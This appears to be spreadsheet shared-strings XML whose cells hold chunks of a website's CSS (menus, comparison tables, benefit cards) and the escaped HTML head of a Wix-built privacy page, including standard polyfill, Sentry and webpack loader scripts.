    <t>.megamenu .menucard__content[data-program-color="blue"] .svg-icon path, .gheader .menu .megamenu .menucard__content[data-program-color="orange"] .svg-icon path, .gheader .menu .megamenu .menucard__content[data-program-color="green"] .svg-icon path, .gheader .menu</t>
  </si>
  <si>
    <t>.megamenu .menucard__content[data-program-color="red"] .svg-icon path{
    fill: #041E42;
}	
}
.testimonial-card .testimonial-card__content p:last-child:after {
    vertical-align: text-top;
    bottom: 8px;
    left: -12px;
}
.form-no-required .gfield_required{
    display: none;
}
.fifty-fifty--list-list .col--right button{
    display: none;
}
.blog .archive-content{
        display: -webkit-box;
    display: -ms-flexbox;
    display: flex;
    -webkit-box-orient: vertical;
    -webkit-box-direction: reverse;
    -ms-flex-direction: column-reverse;
            flex-direction: column-reverse;
}
.minicta{
    background-color: #051f42;
    background-image: none !important;
}
.testimonial-card .testimonial-card__content p:last-child:after{
	left: -5px;
}
#startHerePage * {
  box-sizing: border-box;
}
#startHerePage .col-4, .videoAbout .col-4 {
	width: 33.33%;
}
#startHerePage .section.main{
	padding-top:60px;
	background-color:#fff5f0;
}
#startHerePage #programSection{
	padding:60px 0 30px 0;
	background-color: #ffebde;
}
#startHerePage #formSection{
	padding:60px 0;
	background-color: #b5d4d9;
}
#startHerePage .section .form{
	padding-top:30px;
}
#startHerePage .row::after{
  content: "";
  clear: both;
  display: block;
}
#startHerePage [class*="col-"], .videoAbout   [class*="col-"] {
  float: left;
  padding: 15px;
}
#startHerePage .videoSection{
	display:flex;
	flex-wrap:wrap;
  justify-content: center;
	padding: 20px 20px;
}
#startHerePage .videoSection</t>
  </si>
  <si>
    <t>.col-4{
	padding: 20px 10px;
	width: 33.33%;
}
#startHerePage .videoSection h3, #startHerePage #programSection h3, #startHerePage .videoSection p, #startHerePage #programSection p{
	padding: 0 0</t>
  </si>
  <si>
    <t>5px 0;
	margin: 0;
	color: #00244a;
}
#startHerePage #videoSection h3, #startHerePage #programSection h3, #startHerePage #formSection h3{
	font-size:22px;
	line-height: 1.3;
}
#startHerePage .programWrapper{
	display: block;
	width: 100%;
	background-color: #fff5f0;
	padding: 10px;
	margin-top:20px;
}
#startHerePage label{
	margin: 0;
	padding: 0;
	font-size:16px;
}
#startHerePage label span.age {
    padding-left: 30px;
}
#startHerePage .programWrapper .program-container{
	display: inline-block;
	flex-wrap: wrap;
	flex-direction: row;
	width: 30.4%;
	margin: 0 1%;
}
#startHerePage .selectt {
        width:100%;
	      padding:0;
        display: none;
        margin-top: 20px;
        }
#startHerePage .programWrapper .Challenge.selectt</t>
  </si>
  <si>
    <t>.program-container{
	width: 30.4%;
	margin:0 1%;
}
#startHerePage .selectt label {
        font-size:16px;
	      margin-right: 20px;
        }
#startHerePage p.intro_question{
	font-weight: 600;
	font-style: italic;
}
#startHerePage .video-responsive{
	position: relative;
  overflow: hidden;
  width: 100%;
  padding-top: 56.25%;
}
#startHerePage .video-responsive iframe{
	position: absolute;
  top: 0;
  left: 0;
  bottom: 0;
  right: 0;
  width: 100%;
  height: 100%;
  border: none;
}
.hero__categories a:not(:last-child):after {
    content: ',';
    font-family: inherit;
}
.row.form-row {
    -webkit-box-align: start;
        -ms-flex-align: start;
            align-items: flex-start;
}
.hero .nmm-btn a.btn{
	width:45%;
}
img.heading_icon {
    width: 35px;
    max-width: 35px;
    position: relative;
    bottom: -3px;
}
@media only screen and (max-width: 958px) {
	.videoAbout .col-4 {
    width: 100%;
}
}
@media only screen and (max-width: 768px) {
	#startHerePage .container{
		width: 90%;
	}
 #startHerePage .col-4 {
    width: 100%;
}
 #startHerePage .videoSection .col-4{
	  width: 98%;
		padding: 10px;
	}
  #startHerePage .programWrapper</t>
  </si>
  <si>
    <t>.program-container{
	display: block;
	width: 98%;
	margin: 0 1%;
}
	#startHerePage .programWrapper .Challenge.selectt .program-container {
    width: 98%;
}
	.hero</t>
  </si>
  <si>
    <t>.nmm-btn a.btn{
	width:100%;
}
		}
section{
	overflow: hidden;
} 
/* Comp table page */
.comp_wrap{
	padding-top:10px;
	padding-bottom:10px;
}
img.cc_logo_comp_tbl{
	max-width:200px;
	padding-top:8px;
}
@media only screen and (max-width: 768px) {
.comp_table td:nth-child(2) a {
    display: block;
}
}
/* Standard Tables */
table.comp_table {
	border-collapse: collapse;
  border-right: 10px solid #F5DECE;
	margin-bottom:60px;
	margin-right: 0px;
	margin-left: 0px;
}
caption {
  text-align: left;
  font-style: italic;
  padding: 0.25em 0.5em 0.5em 0.5em;
}
.ff-richtext .comp_table td, .ff-richtext .comp_table</t>
  </si>
  <si>
    <t>th{
	border:none;
}
.comp_table th,
.comp_table td {
  padding: 0.5em;
  text-align: center;
  min-width:190px;
	height:85px;
}
.comp_table td img{
	padding:0;
	margin:0;
	width:100%;
	max-width:45px;
}
.comp_table</t>
  </si>
  <si>
    <t>td:first-of-type {
  text-align: left;
  min-width:200px;
}
.comp_table td:nth-of-type(2) {
}
.comp_table th {
  color: #fff;
	width: 250px;
}
.comp_table</t>
  </si>
  <si>
    <t>th:first-of-type{
  background-color: #F5DECE;
  color: transparent;
}
.comp_table th:nth-of-type(2){
  background-color: #041E42;
}
.comp_table th:nth-of-type(3){
  background-color: #59637E;
	font-size:20px;
	font-weight:600;
}
.comp_table</t>
  </si>
  <si>
    <t>td:first-child{
  color: #041E42;
  font-weight: 600;
  border-bottom: 5px solid #F5E0CF;
  background: #FBEFE5;
}
.comp_table td:nth-child(2){
  background-color: #041E42;
  color: #FFF;
  background-color: #59637E;
  border-bottom: 5px solid #041E42;
}
.comp_table</t>
  </si>
  <si>
    <t>td:nth-child(3) {
  color: #FFF;
  border-bottom: 5px solid #59637E;
  background: #838a9e; 
}
th{
	vertical-align: bottom;
}
td{
	vertical-align: middle;
}
.comp_table td img{
	margin-top: 1em;
}
.form-comparison{
	margin-top: -3em;
}
@media only screen and (max-width: 960px){
		.form-comparison{
	margin-top: 0;
}
	.comp_table</t>
  </si>
  <si>
    <t>th:nth-of-type(3){
  background-color: #59637E;
	font-size:10px;
	font-weight:600;
}
}
/* ---------------------------
--------Fixed Headers---------
------------------------------*/
.comp_table th {
  position: -webkit-sticky;
  position: -moz-sticky;
  position: -ms-sticky;
  position: -o-sticky;
  position: sticky;
  top: 120px;
  z-index: 2;
}
.comp_table th[scope=row] {
  position: -webkit-sticky;
  position: sticky;
  left: 0;
  z-index: 1;
	background: linear-gradient(90deg, transparent 0%, transparent calc(100% - .05em), #d6d6d6 calc(100% - .05em), #d6d6d6 100%);
}
.comp_table</t>
  </si>
  <si>
    <t>th[scope=row] {
  vertical-align: top;
  color: inherit;
  background-color: inherit;
  background: linear-gradient(90deg, transparent 0%, transparent calc(100% - .05em), #d6d6d6 calc(100% - .05em), #d6d6d6 100%);
}
table:nth-of-type(2) th:not([scope=row]):first-child {
  left: 0;
  z-index: 3;
  background: linear-gradient(90deg, #666 0%, #666 calc(100% - .05em), #ccc calc(100% - .05em), #ccc 100%);
}
/ * Strictly for making the scrolling happen. */
.comp_table th[scope</t>
  </si>
  <si>
    <t>td:first-of-type {
  text-align: left;
  min-width:100px;
}
}
/* ---------------------------
--------Member Benefits---------
------------------------------*/	
.member-benefits h3{
	background-color: #B9D3DC;
	font-size: 24px;
	font-weight: 600;
	padding: 5px;
	margin: 30px 0 5px 0;
}
.benefits-card-group{
  width: 100%;
  display: flex;
  flex-wrap: wrap;
}
.benefits-card-group .card</t>
  </si>
  <si>
    <t>{
  box-shadow: 0 4px 8px 0 rgba(0,0,0,0.2);
  transition: 0.3s;
  width: 100%;
  display: flex;
  flex-wrap: wrap;
  margin: 2%;
  }
.benefits-card-group .card .card-img{
	display:block;
  width: 100%;
  background-color: #fff;
	text-align: center;
	display: flex;
  justify-content: center;
	border: solid 10px #FBF6F2;
}
.benefits-card-group .card .card-img img{
	display:block;
  width:auto;
	min-height: 150px;
	max-height:300px;
	margin:auto;
	padding: 20px;
}
.benefits-card-group .card .card-content {
  width: 100%;
  padding: 20px;
	background-color: #FBF6F2;
}
.benefits-card-group .card .card-content h3{
  margin-top: 0;
  padding: 0;
	margin-bottom: 5px;
	font-size: 24px;
	background-color: transparent;
}
@media (min-width: 1200px){
	.fifty-fifty__program h3 img.heading_icon {
    bottom: -6px;
    margin-right: 9px;
}
}
  @media only screen and (min-width: 992px) {
   .benefits-card-group .card {
     width: 46%;
   }
}
/* ---------------------------
--------Community Search Form---------
------------------------------*/
@media only screen and (max-width: 800px){
form#community-search .form-field label{
	margin-bottom: .5rem;
}
form#community-search #results h2{
	margin-bottom: .5rem;
}
form#community-search.form .form-footer{
	margin-top: 1rem;
}
.community-search-intro{
	margin-top: 0;
}
}
/* ---------------------------
--------Program</t>
  </si>
  <si>
    <t>Steps Coloring---------
------------------------*/
div.program-card.active {
    background-color: #FBEFE5;
    border: 1px solid #F8E6D9;
}
.program-card:hover {
    background-color: #FBF6F2;
}
.pid-554 .program-card.active:hover, .pid-555 .program-card.active:hover, .pid-556 .program-card.active:hover, .pid-557 .program-card.active:hover, .pid-558 .program-card.active:hover, .pid-559 .program-card.active:hover  {
	  background-color: #FBF6F2;
}
.pid-554 .program-card.active, .pid-555 .program-card.active, .pid-556</t>
  </si>
  <si>
    <t>&lt;!DOCTYPE html&gt;
&lt;html lang="en"&gt;
&lt;head&gt;
  &lt;meta charset='utf-8'&gt;
  &lt;meta name="viewport" content="width=device-width, initial-scale=1" id="wixDesktopViewport" /&gt;
  &lt;meta http-equiv="X-UA-Compatible" content="IE=edge"&gt;
  &lt;meta name="generator" content="Wix.com Website Builder"/&gt;
  &lt;link rel="icon" sizes="192x192" href="https://static.wixstatic.com/shapes/3f9f3b_d9db5471f8ed48b788a562f483c08b3f.svg"&gt;
  &lt;link rel="shortcut icon" href="https://static.wixstatic.com/shapes/3f9f3b_d9db5471f8ed48b788a562f483c08b3f.svg" type="image/svg+xml"/&gt;
  &lt;link rel="apple-touch-icon" href="https://static.wixstatic.com/shapes/3f9f3b_d9db5471f8ed48b788a562f483c08b3f.svg" type="image/svg+xml"/&gt;
  &lt;!-- Safari Pinned Tab Icon --&gt;
  &lt;!--</t>
  </si>
  <si>
    <t>&lt;link rel="mask-icon" href="https://static.wixstatic.com/shapes/3f9f3b_d9db5471f8ed48b788a562f483c08b3f.svg"&gt; --&gt;
  &lt;!-- Legacy Polyfills --&gt;
  &lt;script nomodule="" src="https://static.parastorage.com/unpkg/core-js-bundle@3.2.1/minified.js"&gt;&lt;/script&gt;
  &lt;script nomodule="" src="https://static.parastorage.com/unpkg/focus-within-polyfill@5.0.9/dist/focus-within-polyfill.js"&gt;&lt;/script&gt;
  &lt;script nomodule="" src="https://polyfill.io/v3/polyfill.min.js?features=fetch"&gt;&lt;/script&gt;
  &lt;!-- Performance API Polyfills --&gt;
  &lt;script&gt;
  (function () {
    var noop = function noop() {};
    if ("performance" in window === false) {
      window.performance = {};
    }
    window.performance.mark = performance.mark || noop;
    window.performance.measure = performance.measure || noop;
    if ("now" in window.performance === false) {
      var nowOffset = Date.now();
      if (performance.timing &amp;&amp; performance.timing.navigationStart) {
        nowOffset = performance.timing.navigationStart;
      }
      window.performance.now = function now() {
        return Date.now() - nowOffset;
      };
    }
  })();
  &lt;/script&gt;
  &lt;!--</t>
  </si>
  <si>
    <t>Globals Definitions --&gt;
  &lt;script&gt;
    (function () {
      var now = Date.now()
      window.initialTimestamps = {
        initialTimestamp: now,
        initialRequestTimestamp: Math.round(performance.timeOrigin ? performance.timeOrigin : now - performance.now())
      }
      window.thunderboltTag = "libs-releases-GA-local"
      window.thunderboltVersion = "1.12039.0"
    })();
  &lt;/script&gt;
  &lt;!-- registry runtime --&gt;
  &lt;!--</t>
  </si>
  <si>
    <t>Sentry --&gt;
  &lt;script id="sentry"&gt;
    (function(c,t,u,n,p,l,y,z,v){if(c[l] &amp;&amp; c[l].mute) {return;}function e(b){if(!w){w=!0;var d=t.getElementsByTagName(u)[0],a=t.createElement(u);a.src=z;a.crossorigin="anonymous";a.addEventListener("load",function(){try{c[n]=q;c[p]=r;var a=c[l],d=a.init;a.init=function(a){for(var b in a)Object.prototype.hasOwnProperty.call(a,b)&amp;&amp;(v[b]=a[b]);d(v)};B(b,a)}catch(A){console.error(A)}});d.parentNode.insertBefore(a,d)}}function B(b,d){try{for(var a=0;a&lt;b.length;a++)if("function"===typeof b[a])b[a]();var f=m.data,g=!1,h=!1;for(a=0;a&lt;f.length;a++)if(f[a].f){h=!0;var e=f[a];!1===g&amp;&amp;"init"!==e.f&amp;&amp;d.init();g=!0;d[e.f].apply(d,e.a)}!1===h&amp;&amp;d.init();var k=c[n],l=c[p];for(a=0;a&lt;f.length;a++)f[a].e&amp;&amp;k?k.apply(c,f[a].e):f[a].p&amp;&amp;l&amp;&amp;l.apply(c,[f[a].p])}catch(C){console.error(C)}}for(var g=!0,x=!1,k=0;k&lt;document.scripts.length;k++)if(-1&lt;document.scripts[k].src.indexOf(y)){g="no"!==document.scripts[k].getAttribute("data-lazy");break}var w=!1,h=[],m=function(b){(b.e||b.p||b.f&amp;&amp;-1&lt;b.f.indexOf("capture")||b.f&amp;&amp;-1&lt;b.f.indexOf("showReportDialog"))&amp;&amp;g&amp;&amp;e(h);m.data.push(b)};m.data=[];c[l]={onLoad:function(b){h.push(b);g&amp;&amp;!x||e(h)},forceLoad:function(){x=!0;g&amp;&amp;setTimeout(function(){e(h)})}};"init addBreadcrumb captureMessage captureException captureEvent configureScope withScope showReportDialog".split(" ").forEach(function(b){c[l][b]=function(){m({f:b,a:arguments})}});var q=c[n];c[n]=function(b,d,a,f,e){m({e:[].slice.call(arguments)});q&amp;&amp;q.apply(c,arguments)};var r=c[p];c[p]=function(b){m({p:b.reason});r&amp;&amp;r.apply(c,arguments)};g||setTimeout(function(){e(h)})})(window,document,"script","onerror","onunhandledrejection","Sentry","605a7baede844d278b89dc95ae0a9123","https://browser.sentry-cdn.com/6.18.2/bundle.min.js",{"dsn":"https://605a7baede844d278b89dc95ae0a9123@sentry-next.wixpress.com/68"});
  &lt;/script&gt;
  &lt;!-- sendFedopsLoadStarted.inline --&gt;
  &lt;script type="application/json" id="wix-fedops"&gt;{"data":{"site":{"metaSiteId":"55d1c091-c97b-4a40-84d4-e20f9c4958df","userId":"395875e9-e449-4c5b-9ef6-20972f33af8b","siteId":"13b6161f-23ad-4ad0-9a0e-63cf6d382223","externalBaseUrl":"https:\/\/www.humongous.com","siteRevision":1110,"siteType":"UGC","dc":"42","isResponsive":false,"sessionId":"dd591798-1b55-442a-bb91-b080502f8ee9"},"rollout":{"siteAssetsVersionsRollout":false,"isDACRollout":0,"isTBRollout":false},"fleetConfig":{"fleetName":"thunderbolt-renderer-light","type":"GA","code":0},"requestUrl":"https:\/\/www.humongous.com\/privacy","isInSEO":false,"platformOnSite":true}}&lt;/script&gt;
  &lt;script&gt;window.fedops = JSON.parse(document.getElementById('wix-fedops').textContent)&lt;/script&gt;
  &lt;script data-url="https://static.parastorage.com/services/wix-thunderbolt/dist/ab-test-compilation/webpack-runtime.0494ec67.bundle.min.js"&gt;!function(){"use strict";var e,n,t,a,r,o={},i={};function d(e){var n=i[e];if(void 0!==n)return n.exports;var t=i[e]={id:e,loaded:!1,exports:{}};return o[e].call(t.exports,t,t.exports,d),t.loaded=!0,t.exports}d.m=o,e=[],d. O=function(n,t,a,r){if(!t){var o=1/0;for(u=0;u&lt;e.length;u++){t=e[u][0],a=e[u][1],r=e[u][2];for(var i=!0,s=0;s&lt;t.length;s++)(!1&amp;r||o&gt;=r)&amp;&amp;Object.keys(d.O).every((function(e){return d.O[e](t[s])}))?t.splice(s--,1):(i=!1,r&lt;o&amp;&amp;(o=r));if(i){e.splice(u--,1);var c=a();void 0!==c&amp;&amp;(n=c)}}return n}r=r||0;for(var u=e.length;u&gt;0&amp;&amp;e[u-1][2]&gt;r;u--)e[u]=e[u-1];e[u]=[t,a,r]},d.n=function(e){var n=e&amp;&amp;e.__esModule?function(){return e.default}:function(){return e};return</t>
  </si>
  <si>
    <t>d.d(n,{a:n}),n},t=Object.getPrototypeOf?function(e){return Object.getPrototypeOf(e)}:function(e){return e.__proto__},d.t=function(e,a){if(1&amp;a&amp;&amp;(e=this(e)),8&amp;a)return e;if("object"==typeof e&amp;&amp;e){if(4&amp;a&amp;&amp;e.__esModule)return e;if(16&amp;a&amp;&amp;"function"==typeof e.then)return e}var r=Object.create(null);d.r(r);var o={};n=n||[null,t({}),t([]),t(t)];for(var i=2&amp;a&amp;&amp;e;"object"==typeof i&amp;&amp;!~n.indexOf(i);i=t(i))Object.getOwnPropertyNames(i).forEach((function(n){o[n]=function(){return e[n]}}));return o.default=function(){return e},d.d(r,o),r},d.d=function(e,n){for(var t in n)d.o(n,t)&amp;&amp;!d.o(e,t)&amp;&amp;Object.defineProperty(e,t,{enumerable:!0,get:n[t]})},d.f={},d.e=function(e){return Promise.all(Object.keys(d.f).reduce((function(n,t){return d.f[t](e,n),n}),[]))},d.u=function(e){return 862===e?"thunderbolt-commons.c358a6aa.bundle.min.js":6008===e?"fastdom.inline.01587bfd.bundle.min.js":2081===e?"render-indicator.inline.4e19d27d.bundle.min.js":({73:"santa-langs-ko",117:"santa-langs-ru",233:"group_2",263:"widget",438:"santa-langs-hi",515:"gift-card-index",612:"group_41",638:"groups-post-index",679:"events-page-structured-data-index",687:"triggersAndReactions",763:"bookings-service-index",783:"video-component-index",872:"componentsqaapi",879:"santa-langs-he",897:"group_19",991:"group_9",1140:"ghostRefComp",1218:"wixDomSanitizer",1220:"santa-langs-en",1344:"Repeater_FluidColumns",1386:"santa-langs-sl",1398:"editorWixCodeSdk",1407:"TPAModal",1475:"tpaWidgetNativeDeadComp",1477:"santa-langs-pt",1711:"debug",1808:"group_1",1954:"santa-langs-sv",2015:"santa-langs-th",2044:"tpaModuleProvider",2084:"santa-langs-sk",2126:"wix-data-page-item-index",2144:"module-executor",2203:"group_40",2262:"TPAPopup",2283:"presenceApi",2355:"widgetWixCodeSdk",2375:"group_22",2511:"reviews-component-index",2519:"santa-langs-de",2945:"bookings-form-index",3001:"group_46",3015:"santa-langs-bg",3071:"portfolio-projects-index",3080:"santa-langs-no",3096:"customCss",3133:"static-page-v2-schema-presets-index",3272:"santa-langs-es",3275:"santa-langs-tl",3639:"businessManager",3669:"group_20",3742:"blog-hashtags-index",3744:"group_15",3756:"static-page-index",3843:"santa-langs-da",3888:"group_42",3948:"group_5",3955:"TPAWorker",3973:"Repeater_FixedColumns",3987:"schedule-page-index",4022:"cyclicTabbing",4102:"AppPart",4152:"santa-langs-hu",4157:"santa-langs-nl",4193:"group_45",4222:"challenges-page-index",4240:"group_26",4281:"qaApi",4417:"group_30",4522:"siteMembers",4794:"portfolio-collections-index",4825:"group_18",4909:"group_0",4919:"stores-product-schema-presets-index",4932:"santa-langs-vi",5060:"santa-platform-utils",5122:"group_31",5130:"motionEffects",5170:"events-page-index",5246:"TPAPreloaderOverlay",5333:"group_27",5350:"group_23",5553:"santa-langs-zh",5705:"group_37",5776:"tpaCommons",5810:"presence-lazy",5831:"externalComponent",5836:"santa-langs-el",5864:"santa-langs-tr",5918:"group_25",5921:"reporter-api",5989:"windowScroll",6107:"group_38",6121:"group_8",6127:"containerSlider",6161:"group_3",6173:"santa-langs-fi",6428:"santa-langs-ar",6464:"SEO_DEFAULT",6496:"santa-langs-ca",6499:"blog-tags-index",6506:"santa-langs-pl",6537:"pro-gallery-item-index",6570:"group_24",6670:"group_43",6692:"group_4",6790:"santa-langs-ja",6805:"editorElementsDynamicTheme",6825:"group_33",6997:"group_44",7122:"seo-api-converters",7212:"siteMembersWixCodeSdk",7290:"breadcrumbs-component-index",7296:"santa-langs-uk",7316:"group_17",7675:"santa-langs-ms",7698:"SiteStyles",7699:"group_14",7718:"santa-langs-lt",7740:"group_35",7745:"platform",7802:"restaurants-order-page-index",7858:"members-area-profile-index",7880:"stores-product-index",7935:"santa-langs-cs",8007:"group_16",8009:"group_6",8094:"blog-post-index",8097:"group_13",8138:"AppPart2",8148:"santa-langs-id",8179:"testApi",8200:"seo-api",8219:"groups-page-index",8308:"santa-langs-ro",8317:"events-page-calculated-index",8381:"group_34",8389:"TPAUnavailableMessageOverlay",8392:"blog-archive-index",8488:"group_32",8559:"forum-category-index",8643:"group_36",8681:"environmentWixCodeSdk",8693:"search-page-index",8794:"searchBox",8834:"santa-langs-fr",8860:"stores-category-index",8945:"renderIndicator",9040:"static-page-v2-index",9110:"forum-post-index",9279:"FontRulersContainer",9339:"stickyToComponent",9487:"bookings-calendar-index",9540:"blog-category-index",9836:"santa-langs-it",9895:"thunderbolt-components-registry",9928:"group_39",9941:"TPABaseComponent"}[e]||e)+"."+{73:"2ab76301",117:"309976d4",233:"b105cf98",263:"90b08ff6",438:"b8d925cd",515:"b97a383c",612:"6835a25f",638:"5abd4b74",679:"e462e33a",687:"8e9f77aa",763:"1d0ed7b6",783:"6184bbcb",872:"f44698ae",879:"2bf9f0dd",897:"206058af",975:"229be52d",991:"18dec1e8",1140:"0af811bf",1218:"1c66fa5c",1220:"682402dc",1344:"aabaddd2",1386:"15133e4a",1398:"05c6b4fd",1407:"bee886ad",1475:"b2a4105d",1477:"890ee49f",1602:"7362a8fa",1643:"52746fcc",1711:"bde13801",1808:"dab1ae9c",1954:"632e2dcd",1969:"fda7a746",2015:"4e772570",2044:"ab68628f",2084:"b8cda1cf",2126:"ca16238b",2144:"f0b0a694",2203:"3609056b",2262:"5398c719",2283:"eb976ae5",2355:"77b78019",2375:"c0e0af5c",2511:"b9770a29",2519:"dee65740",2945:"a6d77823",3001:"a1d681e1",3015:"cf56e58d",3071:"338bc8af",3080:"a9ba2435",3096:"f83487ec",3133:"d8086482",3272:"4dcdef1f",3275:"cf7462ec",3639:"7efd1a46",3669:"f17596c5",3742:"e3010b1b",3744:"f47464c2",3756:"a36fe1ca",3843:"201095ee",3888:"00fbb21c",3948:"6ec334e1",3955:"5178a587",3973:"dbe548d4",3987:"750e8ff6",4022:"7e239701",4102:"28408aec",4152:"c61d917d",4157:"3d273872",4193:"57113c5f",4222:"c51ad3c3",4240:"7d643f5d",4281:"0830c178",4417:"40bbfa83",4522:"1741b363",4794:"060fc82a",4825:"7b8348f9",4909:"e8dc4e62",4919:"31d95355",4932:"e555ab8f",5060:"e3b76b37",5122:"ddfb9310",5130:"c431f463",5170:"9855f7c4",5246:"6e4d2072",5333:"271382fe",5350:"b9b85f29",5553:"12541ba2",5705:"d8d441e7",5776:"e2ec55de",5810:"e5f97531",5831:"6b538c41",5836:"58489070",5864:"1f680c95",5918:"563f7812",5921:"c639ad02",5989:"911d449e",6107:"80075d4d",6121:"657871cb",6127:"e3073d10",6161:"83df58a0",6173:"cd389508",6307:"90353fca",6428:"bdfd2ce9",6464:"796b346a",6496:"6eebd80a",6499:"ac354fc1",6506:"8074efcd",6537:"81cdb68f",6570:"6db038ec",6670:"1787295e",6692:"89037d0d",6790:"041306d5",6805:"41990a7a",6825:"57d590c0",6997:"87889a62",7122:"f92e770b",7212:"81fb6530",7290:"5d77ca39",7296:"24c90649",7316:"4c728fcf",7675:"447d5f14",7698:"44c364cc",7699:"f4a9540c",7718:"9a275839",7740:"571b82e1",7745:"7ec4b194",7802:"df7e63cc",7858:"8e52e33c",7880:"d3b0855e",7935:"b1ce9ac7",8007:"0aca75c4",8009:"f6e12bbc",8094:"83cea439",8097:"8c48e167",8138:"3b8ca767",8148:"5a915986",8179:"e3a54144",8200:"45f8df3b",8219:"8b23cfbb",8308:"850e2831",8317:"dd160ed2",8381:"6f298b7d",8389:"22cc698b",8392:"ac758721",8488:"069923a3",8559:"e0b58494",8643:"92e62916",8681:"85ff293f",8693:"a6a687f2",8794:"9ed08f5b",8834:"d506d971",8860:"7dfc24ac",8945:"bf082912",9040:"1c56a57e",9110:"c61a0765",9279:"ee62341a",9339:"73f87c2c",9487:"995b0a90",9540:"931b5d11",9759:"7cb9810e",9836:"2595ec7d",9895:"079734ef",9928:"780961b0",9941:"c1a77461"}[e]+".chunk.min.js"},d.miniCssF=function(e){return 2081===e?"render-indicator.inline.044c11cb.min.css":{1344:"Repeater_FluidColumns",1407:"TPAModal",1475:"tpaWidgetNativeDeadComp",2262:"TPAPopup",3973:"Repeater_FixedColumns",4102:"AppPart",5246:"TPAPreloaderOverlay",6161:"group_3",8138:"AppPart2",8389:"TPAUnavailableMessageOverlay",9279:"FontRulersContainer",9941:"TPABaseComponent"}[e]+". "+{1344:"2b7b96dd",1407:"52dc3d33",1475:"edad7c2d",2262:"7e7f441d",3973:"9abcda74",4102:"34a92bc1",5246:"6dbffa0c",6161:"3fc73946",8138:"0a2601ec",8389:"fb1e5320",9279:"2b93f1ca",9941:"0f6643a8"}[e]+".chunk.min.css"},d.g=function(){if("object"==typeof globalThis)return globalThis;try{return this||new Function("return this")()}catch(e){if("object"==typeof window)return window}}(),d.o=function(e,n){return Object.prototype.hasOwnProperty.call(e,n)},a={},r="_wix_thunderbolt_app:",d.l=function(e,n,t,o){if(a[e])a[e].push(n);else{var i,s;if(void 0!==t)for(var c=document.getElementsByTagName("script"),u=0;u&lt;c.length;u++){var f=c[u];if(f.getAttribute("src")==e||f.getAttribute("data-webpack")==r+t){i=f;break}}i||(s=!0,(i=document.createElement("script")).charset="utf-8",i.timeout=120,d.nc&amp;&amp;i.setAttribute("nonce",d.nc),i.setAttribute("data-webpack",r+t),i.src=e,0!==i.src.indexOf(window.location.origin+"/")&amp;&amp;(i.crossOrigin="anonymous")),a[e]=[n];var l=function(n,t){i.onerror=i.onload=null,clearTimeout(p);var r=a[e];if(delete a[e],i.parentNode&amp;&amp;i.parentNode.removeChild(i),r&amp;&amp;r.forEach((function(e){return e(t)})),n)return n(t)},p=setTimeout(l.bind(null,void 0,{type:"timeout",target: i}),12e4);i.onerror=l.bind(null,i.onerror),i.onload=l.bind(null,i.onload),s&amp;&amp;document.head.appendChild(i)}},d.r=function(e){"undefined"!=typeof Symbol&amp;&amp;Symbol.toStringTag&amp;&amp;Object.defineProperty(e,Symbol.toStringTag,{value:"Module"}),Object.defineProperty(e,"__esModule",{value:!0})},d.nmd=function(e){return e.paths=[],e.children||(e.children=[]),e},d.p="https://static.parastorage.com/services/wix-thunderbolt/dist/ab-test-compilation/",function(){if("undefined"!=typeof document){var e=function(e){return new Promise((function(n,t){var a=d.miniCssF(e),r=d.p+a;if(function(e,n){for(var t=document.getElementsByTagName("link"),a=0;a&lt;t.length;a++){var r=(i=t[a]).getAttribute("data-href")||i.getAttribute("href");if("stylesheet"===i.rel&amp;&amp;(r===e||r===n))return i}var o=document.getElementsByTagName("style");for(a=0;a&lt;o.length;a++){var i;if((r=(i=o[a]).getAttribute("data-href"))===e||r===n)return i}}(a,r))return n();!function(e,n,t,a,r){var o=document.createElement("link");o.rel="stylesheet",o.type="text/css",o.onerror=o.onload=function(t){if(o.onerror=o.onload=null,"load"===t.type)a();else{var i=t&amp;&amp;("load"===t.type?"missing":t.type),d=t&amp;&amp;t.target&amp;&amp;t.target.href||n,s=new Error("Loading CSS chunk "+e+" failed.\n("+d+")");s.code="CSS_CHUNK_LOAD_FAILED",s.type=i,s.request=d,o.parentNode.removeChild(o),r(s)}},o.href=n,0!==o.href.indexOf(window.location.origin+"/")&amp;&amp;(o.crossOrigin="anonymous"),t?t.parentNode.insertBefore(o,t.nextSibling):document.head.appendChild(o)}(e,r,null,n,t)}))},n={6658:0};d.f.miniCss=function(t,a){n[t]?a.push(n[t]):0!==n[t]&amp;&amp;{1344:1,1407:1,1475:1,2081:1,2262:1,3973:1,4102:1,5246:1,6161:1,8138:1,8389:1,9279:1,9941:1}[t]&amp;&amp;a.push(n[t]=e(t).then((function(){n[t]=0}),(function(e){throw delete n[t],e})))}}}(),function(){var e={6658:0};d.f.j=function(n,t){var a=d.o(e,n)?e[n]:void 0;if(0!==a)if(a)t.push(a[2]);else if(6658!=n){var r=new Promise((function(t,r){a=e[n]=[t,r]}));t.push(a[2]=r);var o=d.p+d.u(n),i=new Error;d.l(o,(function(t){if(d.o(e,n)&amp;&amp;(0!==(a=e[n])&amp;&amp;(e[n]=void 0),a)){var r=t&amp;&amp;("load"===t.type?"missing":t.type),o=t&amp;&amp;t.target&amp;&amp;t.target.src;i.message="Loading chunk "+n+" failed.\n("+r+": "+o+")",i.name="ChunkLoadError",i.type=r,i.request=o,a[1](i)}}),"chunk-"+n,n)}else e[n]=0},d.</t>
  </si>
  <si>
    <t>O.j=function(n){return 0===e[n]};var n=function(n,t){var a,r,o=t[0],i=t[1],s=t[2],c=0;if(o.some((function(n){return 0!==e[n]}))){for(a in i)d.o(i,a)&amp;&amp;(d.m[a]=i[a]);if(s)var u=s(d)}for(n&amp;&amp;n(t);c&lt;o.length;c++)r=o[c],d.o(e,r)&amp;&amp;e[r]&amp;&amp;e[r][0](),e[r]=0;return d.O(u)},t=self.webpackJsonp__wix_thunderbolt_app=self.webpackJsonp__wix_thunderbolt_app||[];t.forEach(n.bind(null,0)),t.push=n.bind(null,t.push.bind(t))}()}();
//# sourceMappingURL=https://static.parastorage.com/services/wix-thunderbolt/dist/ab-test-compilation/webpack-runtime.0494ec67.bundle.min.js.map&lt;/script&gt;
